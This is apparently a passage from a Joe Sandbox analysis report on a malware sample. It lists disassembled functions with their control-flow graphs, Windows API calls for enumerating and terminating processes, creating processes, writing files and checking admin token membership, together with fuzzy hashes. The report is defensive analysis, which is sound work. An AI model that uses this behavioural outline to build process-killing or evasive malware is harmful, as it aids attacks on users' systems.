                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3236713533-0
                                                                                                                                                                                                            • Opcode ID: 0ce10a2caef4782c700173dca69e920874a21eae7d0a0e282ac50b800be46bde
                                                                                                                                                                                                            • Instruction ID: 73920238fc919d22c3cdbb1fe34d81c4edb629e2df67584089582fab6d3ece12
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ce10a2caef4782c700173dca69e920874a21eae7d0a0e282ac50b800be46bde
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C271F071A01206EFC700DFE9FC85676BBB4FB8A710F11861AE449922B5E77548A7CF44
                                                                                                                                                                                                            Function 00A3BD08 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 765 a3bd08-a3bd0f 766 a3bd10-a3bd56 call a313e0 765->766 769 a3bd80-a3bdb5 call a3a4e0 call a5b260 766->769 770 a3bd58-a3bd74 766->770 776 a3bdbb-a3bdfc OpenProcess 769->776 777 a3beb9-a3bed1 769->777 770->769 771 a3bd76 770->771 771->769 780 a3bea3-a3beb2 776->780 781 a3be02-a3be48 TerminateProcess 776->781 778 a3bed3 777->778 779 a3bedd-a3bf13 Process32Next 777->779 778->779 779->766 784 a3bf19-a3bf86 CloseHandle call a5a7e0 779->784 780->777 782 a3be67-a3be89 CloseHandle 781->782 783 a3be4a-a3be61 781->783 782->780 785 a3be8b-a3be9d 782->785 783->782 785->780
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A3BDDD
                                                                                                                                                                                                            • TerminateProcess.KERNELBASE(00000000,000000FF), ref: 00A3BE24
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A3BE68
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00A3BF01
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A3BF2F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandleProcess$NextOpenProcess32Terminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3173823348-0
                                                                                                                                                                                                            • Opcode ID: 4f0d1cdcedccbe76f6ded1fe79bd689d2d999f101a75dd60c96dcef4bcbe41b3
                                                                                                                                                                                                            • Instruction ID: 7b56230b5e0ed75174e27f8e116c4c2f3a736ac4ae110ba8c4b8edac1a60a86f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f0d1cdcedccbe76f6ded1fe79bd689d2d999f101a75dd60c96dcef4bcbe41b3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D510F76A11202DFC704DFE4FC95AAA37B5FB98315F15811AE50A872B0EB348987CB50
                                                                                                                                                                                                            Function 00A5FA80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133processCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 790 a5fa80-a5faa8 791 a5fabe-a5fadf 790->791 792 a5faaa-a5fab7 790->792 793 a5fae1-a5fafe 791->793 794 a5fb00-a5fb19 791->794 792->791 795 a5fb20-a5fbf9 call a5a7e0 * 2 CreateProcessA 793->795 794->795 800 a5fc8f-a5fcb3 795->800 801 a5fbff-a5fc8e CloseHandle * 2 795->801
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,00A4ED48,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00A5FBF1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00A4ED48,?,?,?,?,?,00000000), ref: 00A5FC2F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A5FC58
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2922976086-2746444292
                                                                                                                                                                                                            • Opcode ID: 033bfb43cdac20b4b9b06e7148d736cbf6a62fcd8b3ce9a351e39c515733d92c
                                                                                                                                                                                                            • Instruction ID: a1b31a5481abf9eaa3a7a8f88c57dda38a80ca55ed8cec0b440ec99d20baaaf7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 033bfb43cdac20b4b9b06e7148d736cbf6a62fcd8b3ce9a351e39c515733d92c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2510E31A11206EBD704DFE4FC427AA3BF4FB49711F00812AE44A962B0EBB45497CB85
                                                                                                                                                                                                            Function 00A42120 Relevance: 6.2, APIs: 4, Instructions: 207processCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 802 a42120-a4218a 803 a42196-a421f8 CreateToolhelp32Snapshot 802->803 804 a4218c 802->804 805 a421fe-a42239 803->805 806 a424b9-a424fd call a5a7e0 803->806 804->803 808 a4224f-a42274 Process32First 805->808 809 a4223b-a42248 805->809 811 a4240d-a4244e FindCloseChangeNotification 808->811 812 a4227a 808->812 809->808 814 a42450-a42469 811->814 815 a4246b-a42497 811->815 813 a42280-a42292 812->813 816 a42294-a422a0 813->816 817 a422a6-a422ce call a313e0 813->817 814->806 815->806 818 a42499-a424b2 815->818 816->817 821 a422d0-a422e6 817->821 822 a4230f 817->822 818->806 823 a42319-a42320 call a3a4e0 821->823 824 a422e8-a4230d 821->824 822->823 826 a42325-a42344 call a5b260 823->826 824->823 829 a42346-a42396 Process32Next 826->829 830 a4239e-a423ac 826->830 829->813 831 a4239c 829->831 832 a423d2-a42401 830->832 833 a423ae-a423cc 830->833 831->811 832->811 834 a42403 832->834 833->832 834->811
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A421D0
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00A42257
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00A42384
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00A42426
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3243318325-0
                                                                                                                                                                                                            • Opcode ID: 04b3df3ff69ba08359e638bfbb9750729ad294c79ec897ed2c0813eb1358b969
                                                                                                                                                                                                            • Instruction ID: bdfa29c3537afa85fd9fbf8e1d91d230705cb31a1856d367db9cc8c7d90c9842
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04b3df3ff69ba08359e638bfbb9750729ad294c79ec897ed2c0813eb1358b969
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F910175A00212CFD300DFE5FC887A63BB4FBA5350F45811AE846962B5EBB484A7CF65
                                                                                                                                                                                                            Function 00A41D90 Relevance: 4.7, APIs: 3, Instructions: 187fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 835 a41d90-a41e21 call a65df0 call a53110 840 a41e23-a41e4b call a5fcc0 835->840 841 a41e4c-a41e91 CreateFileA 835->841 843 a41ed1-a41ef0 841->843 844 a41e93-a41ed0 call a5fcc0 841->844 846 a41ef2-a41f06 843->846 847 a41f0c-a41f18 843->847 846->847 850 a41f20-a41f3e 847->850 851 a41f40-a41f57 850->851 852 a41f59-a41f85 850->852 853 a41f8b-a42063 call a3b620 call a5ff30 WriteFile 851->853 852->853 853->850 858 a42069-a4209c FindCloseChangeNotification call a5fcc0 853->858 860 a420a1-a420b6 858->860 861 a420c2-a420ca 860->861 862 a420b8 860->862 862->861
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00A53110: WaitForSingleObject.KERNEL32(?,00004E20,?,00A3D0F2,00000124), ref: 00A531AD
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00A41E7B
                                                                                                                                                                                                              • Part of subcall function 00A5FCC0: ReleaseMutex.KERNEL32(00A3D410,?,00A3D410,00000124), ref: 00A5FCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileMutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1564016613-0
                                                                                                                                                                                                            • Opcode ID: 3cc83534d6ca5f84a5db8fe4ddfcae365e3d4abd800437ea6ec0d9947994cffe
                                                                                                                                                                                                            • Instruction ID: 107a3564fe7ee5614e34130f0c0209cc3ea7b1d8c300cdc4a29cdb7bb77d90bc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cc83534d6ca5f84a5db8fe4ddfcae365e3d4abd800437ea6ec0d9947994cffe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27712376611205DFC704CFE8FC8AA6A37B4FB99305F018219E909976B2DB7498A7CF41
                                                                                                                                                                                                            Function 00A3B7A0 Relevance: 3.1, APIs: 2, Instructions: 89memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 863 a3b7a0-a3b84c AllocateAndInitializeSid 864 a3b861-a3b864 863->864 865 a3b84e-a3b85b 863->865 866 a3b86a-a3b885 CheckTokenMembership 864->866 867 a3b8ee-a3b90e 864->867 865->864 868 a3b887-a3b8ae 866->868 869 a3b8b4-a3b8e8 866->869 868->869 869->867
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A3B82B
                                                                                                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 00A3B87D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateCheckInitializeMembershipToken
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1663163955-0
                                                                                                                                                                                                            • Opcode ID: cb2320dfd7dded724d60044db2bdce2d785148f283502e6ecd8397e4bcd9c598
                                                                                                                                                                                                            • Instruction ID: ca3dcf391744184f04991b07ae794c925df5099c58c7547d04ad524cf781e432
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb2320dfd7dded724d60044db2bdce2d785148f283502e6ecd8397e4bcd9c598
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F331EF75901249EFE704CFF4ED999BA7BB8FB4A300B00815EE402972B2D7B05997DB61
                                                                                                                                                                                                            Function 00A42EB0 Relevance: 3.0, APIs: 2, Instructions: 40memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 871 a42eb0-a42ef9 GetProcessHeap RtlFreeHeap 872 a42f30-a42f42 871->872 873 a42efb-a42f07 871->873 876 a42f44-a42f50 872->876 877 a42f56-a42f57 872->877 874 a42f09-a42f19 873->874 875 a42f1a-a42f2f 873->875 876->877
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00A40367,?,00A40367,00000000), ref: 00A42ED1
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,00A40367,00000000), ref: 00A42ED8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                                                                                            • Opcode ID: 51453e171365800b39587b640dfba2d7d373c1cef88367d0351b26f821e7243b
                                                                                                                                                                                                            • Instruction ID: da7cebd527969591de45e92ccd45986466256c7db839162995e0fa9c7dc7db49
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51453e171365800b39587b640dfba2d7d373c1cef88367d0351b26f821e7243b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A019A39604249CBC314DBE4FE5552A37F9F7887207818306E00E8A2B2C33188A78B15
                                                                                                                                                                                                            Function 00A3E2C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 878 a3e2c0-a3e2e2 879 a3e2f2-a3e306 GetProcessHeap RtlAllocateHeap 878->879 880 a3e2e4-a3e2ec 878->880 880->879
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00A6220A,02167FFC,?,?,?,?,00A5463C), ref: 00A3E2F8
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00A6220A,02167FFC,?,?,?,?,00A5463C), ref: 00A3E2FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                            • Opcode ID: 0273fc1cbb152a6bc930267508da95e311d01b10d79e29cb0b8bb7c9b8b6878f
                                                                                                                                                                                                            • Instruction ID: 115c3a2d1878f4645bd551f45ec073ce44982c9c4d5a53c4d0c7b7b110ce8786
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0273fc1cbb152a6bc930267508da95e311d01b10d79e29cb0b8bb7c9b8b6878f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CE04F761142009FCB04CBE5FC49A9A33B8EB04205B008119F60EC6261C671A5C38F95
                                                                                                                                                                                                            Function 00A545A9 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 881 a545a9-a545dc call a50610 885 a545de 881->885 886 a545e8-a54637 call a5fde0 call a49410 call a61660 881->886 885->886 892 a5463c-a54654 886->892 893 a54656-a54667 892->893 894 a5466d-a54699 call a5b150 ExitProcess 892->894 893->894
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: eed45312cf678ed519a7cd086c85abd0585a53cbef91f64656c42db4127056c6
                                                                                                                                                                                                            • Instruction ID: f4d496f603e0242a49d50459535a6b9e1c5b029a3393182aa724177a304aec99
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eed45312cf678ed519a7cd086c85abd0585a53cbef91f64656c42db4127056c6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F112B766101028FC700EFF0FE4A82637B0F7A63463058426E447861B9FB754557C782
                                                                                                                                                                                                            Function 00A32800 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 897 a32800-a32832 call a5b150 900 a32834 897->900 901 a3283e-a32842 ExitProcess 897->901 900->901
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: a3a0ff1febee31ff2595b58e54fabce9312fd878626ba8f54c38cbe7a8a19ffe
                                                                                                                                                                                                            • Instruction ID: 769b970884b9b042a864c2ff9405fe195b8306b6ac39ac464c12490918a27c81
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3a0ff1febee31ff2595b58e54fabce9312fd878626ba8f54c38cbe7a8a19ffe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAE0867C1002058BC354DFE4D8968763775EB45345754C11BE9560B2A1CA74A447DF91
                                                                                                                                                                                                            Function 00A3A4E0 Relevance: 1.3, APIs: 1, Instructions: 33stringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 902 a3a4e0-a3a53a lstrlen 903 a3a54e-a3a564 902->903 904 a3a53c-a3a548 902->904 904->903
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1659193697-0
